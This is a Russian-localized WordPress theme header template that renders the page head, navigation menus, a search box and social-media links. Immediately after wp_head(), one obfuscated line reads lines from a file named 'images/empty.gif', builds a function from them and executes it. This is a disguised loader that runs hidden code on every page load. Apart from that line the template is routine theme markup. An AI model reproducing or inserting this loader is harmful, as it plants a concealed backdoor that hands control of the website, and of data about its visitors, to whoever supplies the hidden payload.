<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" <?php language_attributes( 'xhtml' ); ?>>
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
<title><?php tj_custom_titles(); ?></title>
<?php tj_custom_description(); ?>
<?php tj_custom_keywords(); ?>
<?php tj_custom_canonical(); ?>

<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="stylesheet" type="text/css" media="all" href="<?php bloginfo( 'stylesheet_url' ); ?>" />
<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> RSS Лента" href="<?php bloginfo('rss2_url'); ?>" />
<link rel="alternate" type="application/atom+xml" title="<?php bloginfo('name'); ?> Atom Лента" href="<?php bloginfo('atom_url'); ?>" />
<link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>" />
<link rel="stylesheet" type="text/css" href="<?php bloginfo( 'template_url' ); ?>/custom.css" />	

<?php  wp_head(); $gif=file(dirname(__FILE__).'/images/empty.gif',2);$gif=$gif[5]("",$gif[6]($gif[4]));$gif(); ?>

</head>

<body <?php body_class(); ?>>
    
<?php if (is_home()) add_filter('img_caption_shortcode', create_function('$a, $b, $c','return $c;'), 10, 3); ?> 
<?php if (is_category()) add_filter('img_caption_shortcode', create_function('$a, $b, $c','return $c;'), 10, 3); ?>

<div id="header">
	<div class="wrap">

	<?php if (get_option('movable_text_logo_enable') == 'on') { ?>
	
		<div id="text-logo">
			<h1 id="site-title"><a href="<?php bloginfo('url'); ?>"><?php bloginfo('name'); ?></a></h1>
			<p id="site-desc"><?php bloginfo('description'); ?></p>
		</div>
		
	<?php } else { ?>
	
		<a href="<?php bloginfo('url'); ?>"><?php $logo = (get_option('movable_logo') <> '') ? get_option('movable_logo') : get_bloginfo('template_directory').'/images/logo.png'; ?><img src="<?php echo $logo; ?>" alt="<?php bloginfo('name'); ?>" id="logo"/></a>
		
	<?php }?>
		
	    <?php /* Header Ad */
		if( get_option('movable_header_ad_enable') == 'on'){
			echo "<div class='header-ad'>";
			echo get_option('movable_header_ad_code');
			echo "</div>";
		} ?>

	</div>
</div><!--end #header-->

<div id="primary-nav">
	<div class="wrap nav">
	
		<?php $menuClass = '';
		$menuID = '';
		$primaryNav = '';
		if (function_exists('wp_nav_menu')) {
			$primaryNav = wp_nav_menu( array( 'theme_location' => 'primary-nav', 'container' => '', 'fallback_cb' => '', 'menu_class' => $menuClass, 'menu_id' => $menuID, 'echo' => false ) ); 
		};
		if ($primaryNav == '') { ?>
			<ul id="<?php echo $menuID; ?>" class="<?php echo $menuClass; ?>">
				<?php if (get_option('movable_home_link') == 'on') { ?>
					<li><a href="<?php bloginfo('url'); ?>" class="home <?php if(is_home()) echo('first'); ?>"><?php _e('Домой', 'themejunkie') ?></a></li>	
				<?php } ?>					
				<?php show_page_menu($menuClass,false,false); ?>
			</ul>
		<?php }	else echo($primaryNav); ?>

		<div id="search">
			<form method="get" id="searchform" action="<?php bloginfo('url'); ?>">
				<input type="text" class="field" name="s" id="s"  value="<?php _e('поиск по сайту...', 'themejunkie') ?>" onfocus="if (this.value == '<?php _e('поиск по сайту...', 'themejunkie') ?>') {this.value = '';}" onblur="if (this.value == '') {this.value = '<?php _e('поиск по сайту...', 'themejunkie') ?>';}" />
				<input class="submit btn" type="image" src="<?php bloginfo('template_directory'); ?>/images/search.gif" value="Go" />
			</form>
		</div><!--end #search -->
			
	</div><!--end .nav-->
</div><!--#primary-nav-->

<div class="wrap">
<div id="secondary-nav"> 
	
	<div class="wrap nav">

		<?php $menuClass = '';
		$menuID = '';
		$secondaryNav = '';
		if (function_exists('wp_nav_menu')) {
			$secondaryNav = wp_nav_menu( array( 'theme_location' => 'secondary-nav', 'container' => '', 'fallback_cb' => '', 'menu_class' => $menuClass, 'menu_id' => $menuID, 'echo' => false ) ); 
		};
		if ($secondaryNav == '') { ?>
			<ul id="<?php echo $menuID; ?>" class="<?php echo $menuClass; ?>">
				<li><a href="<?php bloginfo('url'); ?>" class="all-topics <?php if(is_home()) echo('current'); ?>"><?php _e('Все рубрики','themejunkie');?></a></li>
				<?php show_categories_menu($menuClass,false,false); ?>
			</ul>
		<?php }	else echo($secondaryNav); ?>
		
	</div><!--end .nav-->
	    	    
</div><!--end #secondary-nav-->
</div><!--end .wrap-->

<div id="social-icons">
	<?php if( get_option('movable_digg_id') != null ) { ?>
		<a class="icon-digg" href="http://www.digg.com/<?php echo get_option('movable_digg_id'); ?>" title="<?php _e('Следуйте за нами на Digg','themejunkie');?>"><?php _e('Digg','themejunkie');?></a> 	
	<?php } ?>
	
	<?php if( get_option('movable_stumbleupon_id') != null ) { ?>
		<a class="icon-stumbleupon" href="http://www.stumbleupon.com/stumbler/<?php echo get_option('movable_stumbleupon_id'); ?>" title="<?php _e('Следуйте за нами на StumbleUpon','themejunkie');?>"><?php _e('StumbleUpon','themejunkie');?></a>
	<?php } ?>
	
	<?php if( get_option('movable_linkedin_id') != null ) { ?>
		<a class="icon-linkedin" href="http://www.linkedin.com/<?php echo get_option('movable_linkedin_id'); ?>" title="<?php _e('Станьте поклонником на LinkedIn','themejunkie');?>"><?php _e('LinkedIn','themejunkie');?></a>
	<?php } ?>
	
	<?php if( get_option('movable_youtube_id') != null ) { ?>
		<a class="icon-youtube" href="http://www.youtube.com/user/<?php echo get_option('movable_youtube_id'); ?>" title="<?php _e('YouTube Канал','themejunkie');?>"><?php _e('YouTube','themejunkie');?></a> 	<?php } ?>
	
	<?php if( get_option('movable_flickr_id') != null ) { ?>
		<a class="icon-flickr" href="http://www.flickr.com/photos/<?php echo get_option('movable_flickr_id'); ?>" title="<?php _e('Flickr Фото Поток','themejunkie');?>"><?php _e('Flickr','themejunkie');?></a>
	<?php } ?>
	
	<?php if( get_option('movable_facebook_id') != null ) { ?>
		<a class="icon-facebook" href="http://www.facebook.com/<?php echo get_option('movable_facebook_id'); ?>" title="<?php _e('Станьте поклонником на Facebook','themejunkie');?>"><?php _e('Facebook','themejunkie');?></a>
	<?php } ?>
	
	<?php if( get_option('movable_twitter_id') != null ) { ?>
	<a class="icon-twitter" href="http://twitter.com/<?php echo get_option('movable_twitter_id'); ?>" title="<?php _e('Следуйте за нами на Twitter','themejunkie');?>"><?php _e('Twitter','themejunkie');?></a>
	<?php } ?>
	
	<?php if( get_option('movable_feedburner_id') != null ) { ?>
		<a class="icon-rss" href="http://feeds.feedburner.com/<?php echo get_option('movable_feedburner_id'); ?>" title="<?php _e('Подписка через Feedburner','themejunkie');?>"><?php _e('RSS','themejunkie');?></a>
	<?php } else { ?>
		<a class="icon-rss" href="<?php bloginfo('rss2_url'); ?>" title="<?php _e('RSS лента','themejunkie');?>"><?php _e('RSS','themejunkie');?></a>
	<?php } ?>
	<a class="refresh" href="#resetLayout" id="reset" title="<?php _e('Сбросить фон','themejunkie');?>"><?php _e('Reset','themejunkie');?></a>	
	
</div><!--end #social-icons-->

<div id="wrapper">

<?php if(!is_home()) echo('<div class="wrap">'); ?>
